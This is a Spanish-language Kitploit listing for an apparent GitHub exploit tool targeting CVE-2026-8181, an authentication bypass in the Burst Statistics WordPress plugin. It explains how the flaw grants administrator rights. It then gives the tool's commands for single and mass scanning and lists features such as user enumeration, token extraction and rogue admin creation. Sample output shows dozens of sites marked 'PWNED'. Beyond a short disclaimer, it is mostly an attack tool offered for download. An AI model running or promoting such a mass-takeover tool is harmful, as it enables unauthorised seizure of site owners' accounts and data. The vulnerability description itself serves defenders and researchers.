Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-8181 — CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Omisión de Autenticación para la Toma de Control de una Cuenta de Administrador | Kitploit
Herramientas/GitHubGitHub/xshadow-here/cve-2026-8181
Escalada de PrivilegiosReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHubxshadow-here/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Omisión de Autenticación para la Toma de Control de una Cuenta de Administrador

1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-8181

Burst Statistics | Omisión de autenticación para apropiación de cuenta de administrador

Descripción :

Burst Statistics 3.4.0 - 3.4.1.1 - Omisión de autenticación para apropiación de cuenta de administrador

El plugin Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) para WordPress es vulnerable a la omisión de autenticación en las versiones 3.4.0 a 3.4.1.1. Esto se debe a un manejo incorrecto del valor de retorno en la función is_mainwp_authenticated() al validar las contraseñas de aplicación provenientes de la cabecera Authorization. La función llama a wp_authenticate_application_password(null, $username, $password), la cual devuelve null (no WP_Error) cuando el usuario objetivo no tiene contraseñas de aplicación configuradas. Dado que el código solo comprueba is_wp_error(), continúa llamando a wp_set_current_user(), otorgando privilegios completos de administrador al atacante durante toda la petición.

La omisión se activa durante plugins_loaded (prioridad 9) mediante has_admin_access() en el arranque del plugin, lo que significa que la suplantación del usuario ocurre antes de que la API REST de WordPress despache cualquier ruta, permitiendo el acceso a todos los endpoints del núcleo de WP (/wp/v2/users, /wp/v2/users/me, etc.) como administrador.

Esto permite que atacantes no autenticados, conociendo un nombre de usuario administrador, se hagan pasar por ese administrador proporcionando cualquier contraseña aleatoria de autenticación básica, logrando una escalada completa de privilegios y la apropiación de la cuenta de administrador.

INFO : CVE-2026-8181

~ Puntuación CVSS: 9.8 (Crítico)

~ Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

~ Versiones afectadas: 3.4.0 - 3.4.1.1

~ Versión parcheada: 3.4.2

  • Investigador : Chloe Chamberland - Wordfence

Uso :

Objetivo único :

  • python3 shadow.py -u https://target.com

Objetivo único con nombre de usuario conocido :

  • python3 shadow.py -u https://target.com -U admin

Objetivos masivos :

  • python3 shadow.py -f targets.txt -t 20

Modo interactivo :

  • python3 shadow.py
  • introducir el nombre del archivo de objetivos
  • introducir hilos 1-50 máximo
  • introducir tiempo de espera 5-30s

Características :

  • Multihilo (escaneo masivo de hasta 50 hilos)
  • Omisión de autenticación mediante cabecera X-BURSTMAINWP + Basic Auth
  • Detección automática de WordPress
  • Detección de versión de Burst Statistics y comprobación de versión vulnerable
  • Comprobación de disponibilidad de ruta (/burst/v1/mainwp-auth)
  • Enumeración de usuarios (API REST + archivo de autor + respaldo oEmbed)
  • Extracción de token de contraseña de aplicación
  • Creación de usuario administrador mediante la API REST de WP
  • Restablecimiento de contraseña de administrador (respaldo)
  • Verificación de apropiación mediante wp-login.php
  • Respaldo y reintento automáticos de HTTP/HTTPS
  • Salida triple (user.txt, token.txt, new-user-and-header.txt)

Salida :

root@kitploit:~

╔══════════════════════════════════════════════════════╗
║  🔥 CVE-2026-8181 Burst Statistics Auth Bypass       ║
║  👩‍💻 Friska & Shadow | Route Check | Full Fallback  ║
║  🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output        ║
╚══════════════════════════════════════════════════════╝

[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/

root@kitploit:~

⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────

╔══════════════════════════════════╗
║       📊 SCAN SUMMARY            ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12                     ║
║ ☠️  DEAD: 8                      ║
║ 🔒 SECURED: 5                    ║
║ ⚠️  PATCHED: 15                  ║
║ ❌ FAILED: 10                    ║
╠══════════════════════════════════╣
║ Total: 50                        ║
╚══════════════════════════════════╝

[+] 📁 user.txt | token.txt | new-user-and-header.txt

Descargo de responsabilidad :

Esta herramienta es solo para fines educativos y de pruebas de seguridad.

El uso no autorizado de sistemas que no posees o para los que no tienes permiso de prueba es ilegal.

Descargar herramienta